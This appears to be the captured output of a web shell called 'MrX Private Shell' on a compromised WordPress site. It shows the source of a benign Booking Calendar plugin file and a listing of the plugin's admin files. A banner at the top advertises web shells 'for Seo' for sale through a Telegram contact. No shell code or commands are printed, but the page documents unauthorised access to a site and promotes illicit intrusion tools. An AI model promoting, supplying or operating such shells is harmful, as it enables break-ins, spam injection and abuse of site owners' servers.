__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * @version 1.0 * @package Booking Calendar * @subpackage Getenberg integration * @category inserting into posts * * @author wpdevelop * @link https://wpbookingcalendar.com/ * @email [email protected] * * @modified 2018-04-22 */ // FixIn: 8.3.3.99. if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly function wpbc_gutenberg_block_booking() { if ( function_exists( 'register_block_type' ) ) { $script_params = array( 'wp-blocks', 'wp-element', 'wpbc-modal' ); wp_register_script( 'gutenberg-wpbc-booking', wpbc_plugin_url( '/js/wpbc-gutenberg.js' ), $script_params, '1.0', array( 'in_footer' => WPBC_JS_IN_FOOTER ) ); wp_register_style( 'gutenberg-wpbc-editor', wpbc_plugin_url( '/css/wpbc-gutenberg.css' ), array( 'wp-edit-blocks' ), filemtime( plugin_dir_path( __FILE__ ) . '../../css/wpbc-gutenberg.css' ) ); register_block_type( 'booking/booking', array( 'editor_script' => 'gutenberg-wpbc-booking' , 'editor_style' => 'gutenberg-wpbc-editor' ) ); } } add_action( 'init', 'wpbc_gutenberg_block_booking' );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| api-settings.php | File | 143.4 KB | 0640 |
|
| index.php | File | 27 B | 0640 |
|
| page-email-approved.php | File | 63.38 KB | 0640 |
|
| page-email-deleted.php | File | 61.09 KB | 0640 |
|
| page-email-deny.php | File | 62.29 KB | 0640 |
|
| page-email-new-admin.php | File | 63.39 KB | 0640 |
|
| page-email-new-visitor.php | File | 61.07 KB | 0640 |
|
| page-email-trash.php | File | 61.73 KB | 0640 |
|
| page-ics-export.php | File | 22.75 KB | 0640 |
|
| page-ics-general.php | File | 31.6 KB | 0640 |
|
| page-ics-import.php | File | 38.09 KB | 0640 |
|
| page-import-gcal.php | File | 52.19 KB | 0640 |
|
| page-new.php | File | 8.1 KB | 0640 |
|
| page-settings.php | File | 59.89 KB | 0640 |
|
| page-timeline.php | File | 6.41 KB | 0640 |
|
| page-up.php | File | 2.83 KB | 0640 |
|
| wpbc-dashboard.php | File | 38.09 KB | 0640 |
|
| wpbc-gutenberg.php | File | 1.15 KB | 0640 |
|
| wpbc-settings-functions.php | File | 19.93 KB | 0640 |
|
| wpbc-sql.php | File | 71.37 KB | 0640 |
|
| wpbc-toolbars.php | File | 95.34 KB | 0640 |
|